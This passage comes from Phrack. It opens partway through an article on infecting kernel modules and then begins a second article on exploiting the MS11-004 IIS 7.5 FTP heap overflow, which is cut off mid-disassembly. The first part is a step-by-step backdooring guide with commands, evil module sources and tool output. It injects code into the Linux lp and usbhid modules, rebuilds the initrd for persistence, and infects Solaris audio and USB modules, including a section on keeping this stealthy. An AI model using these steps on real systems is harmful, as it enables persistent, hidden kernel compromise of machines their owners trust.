>> Moving symbol from 28 to 27
|
|
>> Moving symbol from 29 to 28
|
|
>> Moving symbol from 2a to 29
|
|
>> Moving symbol from 2b to 2a
|
|
>> Moving symbol from 2c to 2b
|
|
>> Moving symbol from 2d to 2c
|
|
>> Moving symbol from 2e to 2d
|
|
>> Moving symbol from 2f to 2e
|
|
>> Moving symbol from 30 to 2f
|
|
>> Moving symbol from 31 to 30
|
|
>> Moving symbol from 32 to 31
|
|
>> Moving symbol from 33 to 32
|
|
>> Moving symbol from 34 to 33
|
|
>> Moving symbol from 35 to 34
|
|
>> Moving symbol from 36 to 35
|
|
>> Moving symbol from 37 to 36
|
|
>> Moving symbol from 38 to 37
|
|
>> Moving symbol from 39 to 38
|
|
>> Moving symbol from 3a to 39
|
|
>> Moving symbol from 3b to 3a
|
|
>> Moving symbol from 3c to 3b
|
|
>> Moving symbol from 3d to 3c
|
|
>> Moving our symbol from 36 to 3d
|
|
>> Last LOCAL symbol: 0x3d
|
|
>> Done!
|
|
[+] Updating symbol' infos:
|
|
>> Symbol found at 0x2cc0
|
|
>> Index in symbol table: 0x3d
|
|
>> Replacing flag 'LOCAL' located at 0x2ccc with 'GLOBAL'
|
|
[+] Updating symtab infos at 0x28a0
|
|
|
|
The two modules can be now linked together:
|
|
|
|
$ ld -r lp.ko evil.ko -o new.ko
|
|
$ objdump -t new.ko |grep -e init_module -e evil
|
|
00000000 l df *ABS* 00000000 evil.c
|
|
00000000 l df *ABS* 00000000 evil.mod.c
|
|
00000223 g F .init.text 00000019 evil
|
|
00000175 g F .init.text 000000ae lp_init_module
|
|
00000175 g F .init.text 000000ae init_module
|
|
|
|
Now the relative address of init_module has to be changed to 0000021a:
|
|
|
|
$ ./elfchger -s init_module -v 00000223 new.ko
|
|
[+] Opening new.ko file...
|
|
[+] Reading Elf header...
|
|
>> Done!
|
|
[+] Finding ".symtab" section...
|
|
>> Found at 0x2a34
|
|
[+] Finding ".strtab" section...
|
|
>> Found at 0x2a5c
|
|
[+] Getting symbol' infos:
|
|
>> Symbol found at 0x39a4
|
|
>> Index in symbol table: 0x52
|
|
[+] Replacing 0x00000175 with 0x00000223... done!
|
|
|
|
The new.ko module must be renamed to lp.ko and then loaded:
|
|
|
|
$ mv new.ko lp.ko
|
|
$ sudo rmmod lp
|
|
$ sudo insmod lp.ko
|
|
$ dmesg|tail
|
|
...
|
|
$ dmesg
|
|
....
|
|
[ 1033.418723] Init Inject! Lp
|
|
[ 1033.431131] lp0: using parport0 (interrupt-driven).
|
|
|
|
From now on, every time the system is booted, the infected lp kernel
|
|
module will be loaded instead of the original one.
|
|
|
|
|
|
---[ 5.2 - Backdooring initrd
|
|
|
|
It is also possible to backdoor a module in the initrd image. The target
|
|
module has to be extracted out of the image, backdoored and then reinserted
|
|
back. The target module used throughout this example will be usbhid.ko.
|
|
|
|
In order to inject a kernel module into the initrd image, we'll follow the
|
|
guide in [9], which explains how to add a new module inside the initrd
|
|
image. According to [9], the initrd image can be copied from /boot to a
|
|
target directory (e.g. /tmp) so we can easily work on it:
|
|
|
|
$ cp /boot/initrd.img-2.6.35-22-generic /tmp/
|
|
$ cd /tmp
|
|
|
|
The image can be now decompressed using the gzip tool:
|
|
|
|
$ mv initrd.img-2.6.35-22-generic initrd.img-2.6.35-22-generic.gz
|
|
$ gzip -d initrd.img-2.6.35-22-generic.gz
|
|
$ mkdir initrd
|
|
$ cd initrd/
|
|
$ cpio -i -d -H newc -F ../initrd.img-2.6.35-22-generic \
|
|
--no-absolute-filenames
|
|
50522 blocks
|
|
|
|
The location of the usbhid.ko module has then to be found inside the kernel
|
|
tree:
|
|
|
|
$ find ./ -name usbhid
|
|
./lib/modules/2.6.35-22-generic/kernel/drivers/hid/usbhid
|
|
$ cd lib/modules/2.6.35-22-generic/kernel/drivers/hid/usbhid
|
|
|
|
At this point it can be easily infected with our evil module:
|
|
|
|
$ objdump -t usbhid.ko |grep -e ".init.text"
|
|
00000000 l F .init.text 000000c3 hid_init
|
|
00000000 l d .init.text 00000000 .init.text
|
|
00000000 g F .init.text 000000c3 init_module
|
|
000000c3 g F .init.text 00000019 hiddev_init
|
|
|
|
Since we want to infect the hid_init() function, the evil module will be
|
|
coded in the following way:
|
|
|
|
/****************** evil.c ***********************************************/
|
|
#include <linux/init.h>
|
|
#include <linux/module.h>
|
|
#include <linux/kernel.h>
|
|
#include <linux/errno.h>
|
|
|
|
MODULE_LICENSE("GPL");
|
|
|
|
extern int __init hid_init();
|
|
|
|
int __init evil(void) {
|
|
|
|
hid_init();
|
|
printk(KERN_ALERT "Init Inject! Usbhid");
|
|
|
|
/* does something */
|
|
|
|
return 0;
|
|
}
|
|
/****************** EOF **************************************************/
|
|
|
|
$ ./elfchger -g hid_init usbhid.ko
|
|
[+] Opening usbhid.ko file...
|
|
[+] Reading Elf header...
|
|
>> Done!
|
|
[+] Finding ".symtab" section...
|
|
>> Found at 0xa24c
|
|
[+] Finding ".strtab" section...
|
|
>> Found at 0xa274
|
|
[+] Getting symbol' infos:
|
|
>> Symbol found at 0xa4dc
|
|
>> Index in symbol table: 0x24
|
|
[+] Reordering symbols:
|
|
>> Starting:
|
|
>> Moving symbol from 25 to 24
|
|
...
|
|
>> Moving symbol from a6 to a5
|
|
>> Moving our symbol from 36 to a6
|
|
>> Last LOCAL symbol: 0xa6
|
|
>> Done!
|
|
[+] Updating symbol' infos:
|
|
>> Symbol found at 0xacfc
|
|
>> Index in symbol table: 0xa6
|
|
>> Replacing flag 'LOCAL' located at 0xad08 with 'GLOBAL'
|
|
[+] Updating symtab infos at 0xa24c
|
|
|
|
$ ld -r usbhid.ko evil.ko -o new.ko
|
|
$ objdump -t new.ko | grep -e init_module -e evil
|
|
00000000 l df *ABS* 00000000 evil.c
|
|
00000000 l df *ABS* 00000000 evil.mod.c
|
|
000000dc g F .init.text 0000001b evil
|
|
00000000 g F .init.text 000000c3 init_module
|
|
|
|
|
|
$ ./elf -s init_module -v 000000dc new.ko
|
|
[+] Opening new.ko file...
|
|
[+] Reading Elf header...
|
|
>> Done!
|
|
[+] Finding ".symtab" section...
|
|
>> Found at 0xa424
|
|
[+] Finding ".strtab" section...
|
|
>> Found at 0xa44c
|
|
[+] Getting symbol' infos:
|
|
>> Symbol found at 0xd2dc
|
|
>> Index in symbol table: 0xd5
|
|
[+] Replacing 0x00000000 with 0x000000dc... done!
|
|
|
|
$ mv new.ko usbhid.ko
|
|
|
|
Once the target module has been infected with the evil one, we must
|
|
recreate the initrd image:
|
|
|
|
$ cd /tmp/initrd/
|
|
$ find . | cpio -o -H newc | gzip > /tmp/initrd.img-2.6.35-22-generic
|
|
50522 blocks
|
|
$ cp ../initrd.img-2.6.35-22-generic /boot/
|
|
|
|
From now on, every time the system is booted, the infected usbhid kernel
|
|
module will be loaded instead of the original one.
|
|
|
|
|
|
---[ 6 - What about other systems?
|
|
|
|
|
|
In this last chapter we will see how the presented infection method can
|
|
applied to other operating systems, specifically Solaris, FreeBSD, NetBSD
|
|
and OpenBSD. It will be shown that, even if the method is different from
|
|
that used on Linux, infection is still possible.
|
|
|
|
|
|
---[ 6.1 - Solaris
|
|
|
|
On Solaris systems infecting a kernel module is simpler than on Linux ones.
|
|
Changing the symbol's name in the .strtab ELF section is sufficient,
|
|
similarly to truff's original method for the Linux kernel 2.4.* versions.
|
|
The method has been tested on Solaris 10:
|
|
|
|
# uname -a
|
|
SunOS unknown 5.10 Generic_142910-17 i86pc i386 i86pc
|
|
|
|
|
|
---[ 6.1.1 - A basic example
|
|
|
|
|
|
The orig.c and evil.c source codes are as follows:
|
|
|
|
/******************************** orig.c *********************************/
|
|
#include <sys/ddi.h>
|
|
#include <sys/sunddi.h>
|
|
#include <sys/modctl.h>
|
|
|
|
extern struct mod_ops mod_miscops;
|
|
|
|
static struct modlmisc modlmisc =
|
|
{
|
|
&mod_miscops,
|
|
"original",
|
|
};
|
|
|
|
static struct modlinkage modlinkage =
|
|
{
|
|
MODREV_1,
|
|
(void *) &modlmisc,
|
|
NULL
|
|
};
|
|
|
|
int _init(void) {
|
|
|
|
int i;
|
|
|
|
if ((i = mod_install(&modlinkage)) != 0)
|
|
cmn_err(CE_NOTE, "Can't load module!\n");
|
|
else
|
|
cmn_err(CE_NOTE, "Init Original!");
|
|
|
|
return i;
|
|
}
|
|
|
|
int _info(struct modinfo *modinfop) {
|
|
|
|
return (mod_info(&modlinkage, modinfop));
|
|
}
|
|
|
|
int _fini(void) {
|
|
|
|
int i;
|
|
|
|
if ((i = mod_remove(&modlinkage)) != 0)
|
|
cmn_err(CE_NOTE, "Can't remove module!\n");
|
|
else
|
|
cmn_err(CE_NOTE, "Exit Original!");
|
|
|
|
return i;
|
|
}
|
|
/******************************** EOF ************************************/
|
|
|
|
/******************************** evil.c *********************************/
|
|
#include <sys/ddi.h>
|
|
#include <sys/sunddi.h>
|
|
|
|
#include <sys/modctl.h>
|
|
|
|
extern int _evil(void);
|
|
|
|
int _init(void) {
|
|
|
|
cmn_err(CE_NOTE, "Inject!");
|
|
|
|
_evil();
|
|
|
|
return 0;
|
|
}
|
|
/******************************** EOF ************************************/
|
|
|
|
The _init function is called at module initialisation, while the _fini one
|
|
is called at module cleanup. The _info function prints information about
|
|
the module when the "modinfo" command is invoked. The two modules can be
|
|
compiled using the following commands:
|
|
|
|
# /usr/sfw/bin/gcc -g -D_KERNEL -DSVR4 -DSOL2 -DDEBUG -O2 -c orig.c
|
|
# /usr/sfw/bin/gcc -g -D_KERNEL -DSVR4 -DSOL2 -DDEBUG -O2 -c evil.c
|
|
|
|
Let's have a look at the orig.o ELF file by using the "elfdump" command:
|
|
|
|
# /usr/ccs/bin/elfdump -s orig.o
|
|
|
|
Symbol Table Section: .symtab
|
|
index value size type bind oth ver shndx name
|
|
[0] 0x00000000 0x00000000 NOTY LOCL D 0 UNDEF
|
|
[1] 0x00000000 0x00000000 FILE LOCL D 0 ABS orig.c
|
|
[2] 0x00000000 0x00000000 SECT LOCL D 0 .text
|
|
|
|
...
|
|
|
|
[16] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_miscops
|
|
[17] 0x00000000 0x0000004d FUNC GLOB D 0 .text _init
|
|
[18] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_install
|
|
[19] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF cmn_err
|
|
[20] 0x00000050 0x00000018 FUNC GLOB D 0 .text _info
|
|
[21] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_info
|
|
[22] 0x00000068 0x0000004d FUNC GLOB D 0 .text _fini
|
|
[23] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_remove
|
|
|
|
The _evil() function must be called instead of _init when the module is
|
|
loaded. To achieve this, the following steps have to be performed:
|
|
|
|
- Change the _init symbol name to _evil in orig.o;
|
|
- Link the two modules together;
|
|
|
|
This way, the kernel will load the _init() function defined in evil.c which
|
|
in turn will call the _evil() function (the old _init()) in order to
|
|
maintain the correct behaviour of the orig module. It is possible to change
|
|
a symbol name using the 'objcopy' tool. In fact the '--redefine-sym' option
|
|
can be used to give an arbitrary name to the specified symbol:
|
|
|
|
# /usr/sfw/bin/gobjcopy --redefine-sym _init=_evil orig.o
|
|
# /usr/ccs/bin/elfdump -s orig.o
|
|
|
|
Symbol Table Section: .symtab
|
|
index value size type bind oth ver shndx name
|
|
[0] 0x00000000 0x00000000 NOTY LOCL D 0 UNDEF
|
|
[1] 0x00000000 0x00000000 FILE LOCL D 0 ABS orig.c
|
|
[2] 0x00000000 0x00000000 SECT LOCL D 0 .text
|
|
|
|
...
|
|
|
|
[16] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_miscops
|
|
[17] 0x00000000 0x0000004d FUNC GLOB D 0 .text _evil
|
|
[18] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_install
|
|
[19] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF cmn_err
|
|
[20] 0x00000050 0x00000018 FUNC GLOB D 0 .text _info
|
|
[21] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_info
|
|
[22] 0x00000068 0x0000004d FUNC GLOB D 0 .text _fini
|
|
[23] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_remove
|
|
|
|
|
|
By checking with "elfdump" it is possible to verify if the script properly
|
|
performed its job:
|
|
|
|
# /usr/ccs/bin/elfdump -s orig.o
|
|
|
|
Symbol Table Section: .symtab
|
|
index value size type bind oth ver shndx name
|
|
[0] 0x00000000 0x00000000 NOTY LOCL D 0 UNDEF
|
|
[1] 0x00000000 0x00000000 FILE LOCL D 0 ABS orig.c
|
|
[2] 0x00000000 0x00000000 SECT LOCL D 0 .text
|
|
|
|
...
|
|
|
|
[16] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_miscops
|
|
[17] 0x00000000 0x0000004d FUNC GLOB D 0 .text _evil
|
|
[18] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_install
|
|
[19] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF cmn_err
|
|
[20] 0x00000050 0x00000018 FUNC GLOB D 0 .text _info
|
|
[21] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_info
|
|
[22] 0x00000068 0x0000004d FUNC GLOB D 0 .text _fini
|
|
[23] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_remove
|
|
|
|
The _init symbol name has been modified to _evil. The modules are then
|
|
linked together using the "ld" command:
|
|
|
|
# ld -r orig.o evil.o -o new.o
|
|
|
|
The new.o elf file dump follows:
|
|
|
|
# /usr/ccs/bin/elfdump -s new.o
|
|
|
|
Symbol Table Section: .symtab
|
|
index value size type bind oth ver shndx name
|
|
[0] 0x00000000 0x00000000 NOTY LOCL D 0 UNDEF
|
|
[1] 0x00000000 0x00000000 FILE LOCL D 0 ABS new.o
|
|
[2] 0x00000000 0x00000000 SECT LOCL D 0 .text
|
|
|
|
...
|
|
|
|
[27] 0x00000000 0x00000000 FILE LOCL D 0 ABS evil.c
|
|
[28] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_install
|
|
[29] 0x00000000 0x0000004d FUNC GLOB D 0 .text _evil
|
|
[30] 0x00000068 0x0000004d FUNC GLOB D 0 .text _fini
|
|
[31] 0x00000050 0x00000018 FUNC GLOB D 0 .text _info
|
|
[32] 0x000000b8 0x0000001e FUNC GLOB D 0 .text _init
|
|
[33] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_miscops
|
|
[34] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_info
|
|
[35] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_remove
|
|
[36] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF cmn_err
|
|
|
|
To summarize, the _init symbol is referring to the function defined in
|
|
evil.c, while the _evil symbol is referring to the old _init defined in
|
|
orig.c that we have just renamed to _evil.
|
|
|
|
Now, the last step is to rename the new.o into orig.o and to load it:
|
|
|
|
# mv new.o orig.o
|
|
# modload orig.o
|
|
# tail /var/adm/messages
|
|
...
|
|
May ... orig.o: [ID 343233 kern.notice] NOTICE: Inject!
|
|
May ... orig.o: [ID 662037 kern.notice] NOTICE: Init Original!
|
|
|
|
As you can see the module is successfully infected.
|
|
|
|
# modinfo | grep orig.o
|
|
247 fa9e6eac 160 - 1 orig.o (original)
|
|
|
|
# modunload -i 247
|
|
|
|
|
|
---[ 6.1.2 - Playing with OS modules
|
|
|
|
|
|
This section will explain how to infect a system kernel module. The method
|
|
remains the same but it will be necessary to make minor changes to the evil
|
|
module in order to correctly load it to memory. The evil module will be
|
|
injected into the audio driver. First of all, the module has to be
|
|
unloaded:
|
|
|
|
# modinfo | grep lx_audio
|
|
216 f99e40e0 2614 242 1 lx_audio (linux audio driver 'lx_audio' 1)
|
|
# modunload -i 216
|
|
|
|
Now, it is possible to play with it:
|
|
|
|
# /usr/ccs/bin/elfdump -s lx_audio|grep _init
|
|
[64] 0x000020c2 0x00000011 FUNC GLOB D 0 .text _init
|
|
[118] 0x00000000 0x00000000 FUNC GLOB D 0 UNDEF mutex_init
|
|
|
|
# /usr/sfw/bin/gobjcopy --redefine-sym _init=_evil lx_audio
|
|
# ld -r evil.o lx_audio -o new
|
|
# /usr/ccs/bin/elfdump -s new|grep _evil
|
|
[77] 0x000020de 0x00000011 FUNC GLOB D 0 .text _evil
|
|
|
|
# mv new lx_audio
|
|
# modload lx_audio
|
|
|
|
# tail /var/adm/messages
|
|
...
|
|
|
|
Dec 29 17:00:19 spaccio lx_audio: ... NOTICE: Inject!
|
|
|
|
Great, it works!
|
|
|
|
|
|
---[ 6.1.3 - Keeping it stealthy
|
|
|
|
|
|
According to the /etc/system file, the kernel modules that are loaded at
|
|
boot time are located in the /kernel and /usr/kernel directories. The
|
|
platform-dependent modules reside in the /platform directory. In this
|
|
example I'll infect the usb kernel module: usba.
|
|
|
|
First of all the kernel module's position in the filesystem must be
|
|
located:
|
|
|
|
# find /kernel -name usba
|
|
/kernel/misc/amd64/usba
|
|
/kernel/misc/usba
|
|
/kernel/kmdb/amd64/usba
|
|
/kernel/kmdb/usba
|
|
|
|
# cd /kernel/misc/usba
|
|
|
|
# /usr/ccs/bin/elfdump -s usba|grep _init
|
|
...
|
|
|
|
[291] 0x00017354 0x0000004c FUNC LOCL D 0 .text ugen_ds_init
|
|
[307] 0x00017937 0x000000e3 FUNC LOCL D 0 .text ugen_pm_init
|
|
[347] 0x00000fd4 0x00000074 FUNC GLOB D 0 .text _init
|
|
....
|
|
[655] 0x00000000 0x00000000 FUNC GLOB D 0 UNDEF rw_init
|
|
[692] 0x00000000 0x00000000 FUNC GLOB D 0 UNDEF cv_init
|
|
|
|
Now it is possible to change the _init symbol name to _evil.
|
|
|
|
# /usr/sfw/bin/gobjcopy --redefine-sym _init=_evil usba
|
|
# /usr/ccs/bin/elfdump -s usba|grep _evil
|
|
[348] 0x00000fd4 0x00000074 FUNC GLOB D 0 .text _evil
|
|
|
|
# ld -r evil.o usba -o new
|
|
|
|
Now we have only to rename the module to its original name:
|
|
|
|
# mv new usba
|
|
|
|
From now on, every time the system is booted, the infected usba kernel
|
|
module will be loaded instead of the original one.
|
|
|
|
|
|
---[ 6.2 - *BSD
|
|
|
|
|
|
---[ 6.2.1 - FreeBSD - NetBSD - OpenBSD
|
|
|
|
|
|
The conclusions made by truff are still valid in the newest versions of
|
|
these operating systems. On FreeBSD, kernel modules are shared objects, so
|
|
the proposed method doesn't work because the kernel modules can't be
|
|
partially linked. On NetBSD and OpenBSD what we have to do is simply to
|
|
change the entry point of the kernel module when it is loaded. So our
|
|
function will be invoked instead the original one.
|
|
|
|
|
|
---[ 7 - Conclusions
|
|
|
|
|
|
In this paper a new module injection method was introduced to be used with
|
|
Linux kernel 2.6.x/3.0.x series. Several methods, from simple to more
|
|
sophisticated were presented to inject external code into kernel modules.
|
|
|
|
It was also explained how the method (with some changes) can be
|
|
successfully applied to a wide range of operating systems. I hope you'll
|
|
have fun with it and that you enjoyed this paper!
|
|
|
|
Bye.
|
|
|
|
|
|
---[ 8 - References
|
|
|
|
|
|
[1] Infecting loadable kernel modules
|
|
http://www.phrack.com/issues.html?issue=61&id=10#article
|
|
|
|
[2] EXECUTABLE AND LINKABLE FORMAT (ELF)
|
|
http://www.muppetlabs.com/~breadbox/software/ELF.txt
|
|
|
|
[3] Init Call Mechanism in the Linux Kernel
|
|
http://linuxgazette.net/157/amurray.html
|
|
|
|
[4] Understanding the Linux Kernel, 3rd Edition
|
|
|
|
[5] Init Call Mechanism in the Linux Kernel
|
|
http://linuxgazette.net/157/amurray.html
|
|
|
|
[6] OpenBSD Loadable Kernel Modules
|
|
http://www.thc.org/root/docs/loadable_kernel_modules/openbsd-lkm.html
|
|
|
|
[7] Introduction to NetBSD loadable kernel modules
|
|
http://www.home.unix-ag.org/bmeurer/NetBSD/howto-lkm.html
|
|
|
|
[8] Solaris Loadable Kernel Modules
|
|
http://www.thc.org/papers/slkm-1.0.html
|
|
|
|
[9] Initrd, modules, and tools
|
|
http://www.dark.ca/2009/06/10/initrd-modules-and-tools/
|
|
|
|
|
|
---[ 9 - Codes
|
|
|
|
---[ 9.1 - Elfchger
|
|
|
|
---[ 9.2 - elfstrchange.patch
|
|
|
|
---[ EOF
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x0c of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-------------=[ The Art of Exploitation ]=-----------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-------------------=[ Exploiting MS11-004 ]=-----------------------=|
|
|
|=----------=[ Microsoft IIS 7.5 remote heap buffer overflow ]=----------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=------------------------=[ by redpantz ]=----------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
--[ Table of Contents
|
|
|
|
1 - Introduction
|
|
2 - The Setup
|
|
3 - The Vulnerability
|
|
4 - Exploitation Primitives
|
|
5 - Enabling the LFH
|
|
6 - FreeEntryOffset Overwrite
|
|
7 - The Impossible
|
|
8 - Conclusion
|
|
9 - References
|
|
10 - Exploit (thing.py)
|
|
|
|
|
|
--[ 1 - Introduction
|
|
|
|
Exploitation of security vulnerabilities has greatly increased in
|
|
difficulty since the days of the Slammer worm. There have been numerous
|
|
exploitation mitigations implemented since the early 2000's. Many of these
|
|
mitigations were focused on the Windows heap; such as Safe Unlinking and
|
|
Heap Chunk header cookies in Windows XP Service Pack 2 and Safe Linking,
|
|
expanded Encoded Chunk headers, Terminate on Corruption, and many others in
|
|
Windows Vista/7 [1].
|
|
|
|
The widely deployed implementation of anti-exploitation technologies has
|
|
made gaining code execution from vulnerabilities much more expensive
|
|
(notice that I say "expensive" and not "impossible"). By forcing the
|
|
attacker to acquire more knowledge and spend expansive amounts of research
|
|
time, the vendor has made exploiting these vulnerabilities increasingly
|
|
difficult.
|
|
|
|
This article will take you through the exploitation process (read: EIP) of
|
|
a heap overflow vulnerability in Microsoft IIS 7.5 (MS11-004) on a 32-bit,
|
|
single-core machine. While the target is a bit unrealistic for the
|
|
real-world, and exploit reliability may be a bit suspect, it does suffice
|
|
in showing that an "impossible to exploit" vulnerability can be leveraged
|
|
for code execution with proper knowledge and sufficient time.
|
|
|
|
Note: The structure of this article will reflect the steps, in order, taken
|
|
when developing the exploit. It differs from the linear nature of the
|
|
actual exploit because it is designed to show the thought process during
|
|
exploit development. Also, since this article was authored quite some time
|
|
after the initial exploitation process, some steps may have been left out
|
|
(i.e. forgotten); quite sorry about that.
|
|
|
|
|
|
--[ 2 - The Setup
|
|
|
|
A proof of concept was released by Matthew Bergin in December 2010 that
|
|
stated there existed an unauthenticated Denial of Service (DoS) against
|
|
IIS FTP 7.5, which was triggered on Windows 7 Ultimate [3]. The exploit
|
|
appeared to lack precision, so it was decided further investigation was
|
|
necessary.
|
|
|
|
After creating a test environment, the exploit was run with a debugger
|
|
attached to the FTP process. Examination of the error concluded it wasn't
|
|
a DoS and most likely could be used to achieve remote code execution:
|
|
|
|
BUGCHECK_STR:
|
|
APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_\
|
|
heap_failure_freelists_corruption
|
|
|
|
PRIMARY_PROBLEM_CLASS:
|
|
ACTIONABLE_HEAP_CORRUPTION_heap_failure_freelists_corruption
|
|
|
|
DEFAULT_BUCKET_ID:
|
|
ACTIONABLE_HEAP_CORRUPTION_heap_failure_freelists_corruption
|
|
|
|
STACK_TEXT:
|
|
77f474cb ntdll!RtlpCoalesceFreeBlocks+0x3c9
|
|
77f12eed ntdll!RtlpFreeHeap+0x1f4
|
|
77f12dd8 ntdll!RtlFreeHeap+0x142
|
|
760074d9 KERNELBASE!LocalFree+0x27
|
|
72759c59 IISUTIL!BUFFER::FreeMemory+0x14
|
|
724ba6e3 ftpsvc!FTP_COMMAND::WriteResponseAndLog+0x8f
|
|
724beff8 ftpsvc!FTP_COMMAND::Process+0x243
|
|
724b6051 ftpsvc!FTP_SESSION::OnReadCommandCompletion+0x3e2
|
|
724b76c7 ftpsvc!FTP_CONTROL_CHANNEL::OnReadCommandCompletion+0x1e4
|
|
724b772a ftpsvc!FTP_CONTROL_CHANNEL::AsyncCompletionRoutine+0x17
|
|
7248f182 ftpsvc!FTP_ASYNC_CONTEXT::OverlappedCompletionRoutine+0x3c
|
|
724a56e6 ftpsvc!THREAD_POOL_DATA::ThreadPoolThread+0x89
|
|
724a58c1 ftpsvc!THREAD_POOL_DATA::ThreadPoolThread+0x24
|
|
724a4f8a ftpsvc!THREAD_MANAGER::ThreadManagerThread+0x42
|
|
76bf1194 kernel32!BaseThreadInitThunk+0xe
|
|
77f1b495 ntdll!__RtlUserThreadStart+0x70
|
|
77f1b468 ntdll!_RtlUserThreadStart+0x1b
|
|
|
|
While simple write-4 primitives have been extinct since the Windows XP SP2
|
|
days [1], there was a feeling that currently known, but previously unproven
|
|
techniques could be leveraged to gain code execution. Adding fuel to the
|
|
fire was a statement from Microsoft stating that the issue "is a Denial of
|
|
Service vulnerability and remote code execution is unlikely" [4].
|
|
|
|
With the wheels set in motion, it was time to figure out the vulnerability,
|
|
gather exploitation primitives, and subvert the flow of execution by any
|
|
means necessary...
|
|
|
|
|
|
--[ 3 - The Vulnerability
|
|
|
|
The first order of business was to figure out the root cause of the
|
|
vulnerability. Understanding the root cause of the vulnerability was
|
|
integral into forming a more refined and concise proof of concept that
|
|
would serve as a foundation for exploit development.
|
|
|
|
As stated in the TechNet article, the flaw stemmed from an issue when
|
|
processing Telnet IAC codes [5]. The IAC codes permit a Telnet client to
|
|
tell the Telnet server various commands within the session. The 0xFF
|
|
character denotes these commands. TechNet also describes a process that
|
|
requires the 0xFF characters to be 'escaped' when sending a response by
|
|
adding an additional 0xFF character.
|
|
|
|
Now that there is context around the vulnerability, the corresponding crash
|
|
dump can be further analyzed. Afterwards we can open the binary in
|
|
IDA Pro and attempt to locate the affected code. Unfortunately, after
|
|
statically cross-referencing the function calls from the stack trace, there
|
|
didn't seem to be any functions that performed actions on Telnet IAC codes.
|
|
While breakpoints could be set on any of the functions in the stack trace,
|
|
another path was taken.
|
|
|
|
Since the public symbols named most of the important functions within the
|
|
ftpsvc module, it was deemed more useful to search the function list than
|
|
set debugger breakpoints. A search was made for any function starting with
|
|
'TELNET', resulting in 'TELNET_STREAM_CONTEXT::OnReceivedData' and
|
|
'TELNET_STREAM_CONTEXT::OnSendData'. The returned results proved to be
|
|
viable after some quick dynamic analysis when sending requests and
|
|
receiving responses.
|
|
|
|
The OnReceivedData function was investigated first, since it was the first
|
|
breakpoint that was hit. Essentially the function attempts to locate Telnet
|
|
IAC codes (0xFF), escape them, parse the commands and normalize the
|
|
request. Unfortunately it doesn't account for seeing two consecutive IAC
|
|
codes.
|
|
|
|
The following is pseudo code for important portions of OnReceivedData:
|
|
|
|
TELNET_STREAM_CONTEXT::OnReceivedData(char *aBegin,
|
|
DATA_STEAM_BUFFER *aDSB, ...)
|
|
{
|
|
DATA_STREAM_BUFFER *dsb = aDSB;
|
|
int len = dsb->BufferLength;
|
|
char *begin = dsb->BufferBegin;
|
|
char *adjusted = dsb->BufferBegin;
|
|
char *end = dsb->BufferEnd;
|
|
char *curr = dsb->BufferBegin;
|
|
|
|
if(len >= 3)
|
|
{
|
|
//0xF2 == 242 == Data Mark
|
|
if(begin[0] == 0xFF && begin[1] == 0xFF && begin[2] == 0xF2)
|
|
curr = begin + 3;
|
|
}
|
|
|
|
bool seen_iac = false;
|
|
bool seen_subneg = false;
|
|
if(curr >= end)
|
|
return 0;
|
|
|
|
while(curr < end)
|
|
{
|
|
char curr_char = *curr;
|
|
|
|
//if we've seen an iac code
|
|
//look for a corresponding cmd
|
|
if(seen_iac)
|
|
{
|
|
seen_iac = false;
|
|
if(seen_subneg)
|
|
{
|
|
seen_subneg = false;
|
|
if(curr_char < 0xF0)
|
|
*adjusted++ = curr_char;
|
|
}
|
|
else
|
|
{
|
|
if(curr_char != 0xFA)
|
|
{
|
|
if(curr_char != 0xFF)
|
|
{
|
|
if(curr_char < 0xF0)
|
|
{
|
|
PuDbgPrint("Invalid command %c", curr_char)
|
|
|
|
if(curr_char)
|
|
*adjusted++ = curr_char;
|
|
}
|
|
}
|
|
else
|
|
{
|
|
if(curr_char)
|
|
*adjusted++ = curr_char;
|
|
}
|
|
}
|
|
else
|
|
{
|
|
seen_iac = true;
|
|
seen_subneg = true;
|
|
}
|
|
}
|
|
|
|
}
|
|
else
|
|
{
|
|
if(curr_char == 0xFF)
|
|
seen_iac = true;
|
|
else
|
|
if(curr_char)
|
|
*adjusted++ = curr_char;
|
|
}
|
|
|
|
curr++;
|
|
}
|
|
|
|
dsb->BufferLength = adjusted - begin;
|
|
return 0;
|
|
}
|
|
|
|
The documentation states Telnet IAC codes can be used by: "Either end of a
|
|
Telnet conversation can locally or remotely enable or disable an option".
|
|
The diagram below represents the 3-byte IAC command within the overall
|
|
Telnet connection stream:
|
|
|
|
0x0 0x2
|
|
--------------------------------
|
|
[IAC][Type of Operation][Option]
|
|
--------------------------------
|
|
|
|
Note: The spec should have been referenced before figuring out the
|
|
vulnerability, instead of reading the code and attempting to figure out
|
|
what could go wrong.
|
|
|
|
Although there is code to escape IAC characters, the function does not
|
|
except to see two consecutive 0xFF characters in a row. Obviously this
|
|
could be a problem, but it didn't appear to contain any code that would
|
|
result in overflow. Thinking about the TechNet article recalled the line
|
|
'error in the response', so the next logical function to examine was
|
|
'OnSendData'.
|
|
|
|
Shortly into the function it can be seen that OnSendData is looking for
|
|
IAC (0xFF) codes:
|
|
|
|
.text:0E07F375 loc_E07F375:
|
|
.text:0E07F375 inc edx
|
|
